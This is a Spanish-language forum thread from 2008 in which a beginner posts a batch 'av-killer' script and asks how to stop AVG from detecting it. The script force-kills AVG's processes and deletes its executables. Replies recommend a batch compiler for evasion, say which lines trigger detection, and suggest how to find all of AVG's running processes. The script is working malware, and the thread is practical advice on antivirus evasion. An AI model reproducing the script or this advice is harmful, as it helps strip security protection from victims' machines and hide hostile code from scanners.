Que no detecten mi av-killer hecho en batch...

Carloswaldo · 10 Mayo 2008, 21:51 PM

Estoy empezando en batch y escribí el código de un av-killer muy simple

Ahí está:

@echo off
taskkill /f /im avgamsvr.exe
taskkill /f /im avgcc.exe
taskkill /f /im avgemc.exe
taskkill /f /im avgupsvc.exe
cd %programfiles%\Grisoft\AVG7
del *.exe
exit

Bueno, la cosa es que el avg me lo detecta y me niega el acceso al archivo (ni siquiera para editarlo). He probado con un .bat compiler, pero lo que hace es un .exe que crea el .bat en una carpeta temporal y lo ejecuta, con lo que obviamente el avg lo detecta al tiempo de la ejecución.

¿Hay alguna forma de mejorar el código de forma que no lo detecte el avg?
Graciasssss....

Carloswaldo

Freeze. · 10 Mayo 2008, 21:58 PM

Puedes mirar aca talvez:
http://foro.elhacker.net/scripting/batch_file_creator_generador_de_archivos_binarios_con_batch-t147020.0.html

MK-Ultra · 10 Mayo 2008, 21:59 PM

Podes usar un mejor compilador para tus batch (sugiero el Quick Batch File Compiler, tratá de obtenerlo full versión) o sino borrale estas lines :

Código [Seleccionar]


cd %programfiles%\Grisoft\AVG7
del *.exe

Que son las que hacen que salte el av (creo)

Espero que te sirva

PD: Usas el AVG ??? $:-\$ Te recomiendo un par:
- avast!
- Kaperspy
- NOD32 (considerado el mejor)

Freeze. · 10 Mayo 2008, 22:01 PM

Ese que recomiendas es muy bueno

Te lo re-recomiendo

Te recomiendo un par: Sera trio

Yo creo que la linea que hace que salte el AVG es del *.exe el resto es algo normal

MK-Ultra · 10 Mayo 2008, 22:02 PM

Un par se utiliza tambien para enlistar varios elementos (2 o más)

Citar
Yo creo que la linea que hace que salte el AVG es del *.exe el resto es algo normal tongue

Lo del cd estaría de más si se borrase la linea del comando del, asi que la incluí para que la borre

Carloswaldo · 11 Mayo 2008, 20:10 PM

Estaré probando el quick batch compiler

Cita de: ^Arkangel^ en 10 Mayo 2008, 21:59 PM
PD: Usas el AVG ??? $:-\$ Te recomiendo un par:
- avast!
- Kaperspy
- NOD32 (considerado el mejor)

Gracias por las sugerencias pero prefiero el avg por experiencias propias.

Por cierto, si yo mato esos procesos manualmente e intento abrir mi archivo .bat, me sale "Acceso Denegado", lo que sospecho es que algún servicio del avg sigue activo, alguna idea de como saber cuales son todos los procesos que utiliza el avg?

MK-Ultra · 11 Mayo 2008, 20:44 PM

Si, mientras esta activado, abri el administrador de tareas y fijate cuales son del av.

Un saludo

Carloswaldo · 11 Mayo 2008, 20:54 PM

Cita de: ^Arkangel^ en 11 Mayo 2008, 20:44 PM
Si, mientras esta activado, abri el administrador de tareas y fijate cuales son del av.

OBVIO, pero como se yo cuales son.

Freeze. · 11 Mayo 2008, 20:55 PM

Mirando los ejecutables que tienes en la ruta de la carpeta del AVG, OBVIO

Carloswaldo · 11 Mayo 2008, 21:12 PM

Qué? y eso como se ve?

Por cierto con el Qbc me va de lujo, pero cuando quiero ejecutar el ejecutable a partir del codigo anterior no hace absolutamente nada como gosth aplication, si lo pongo en modo consola me sale en una linea "Acceso Denegado", sin embargo el exe no es detectado por el avg. $:-\$ Ideas?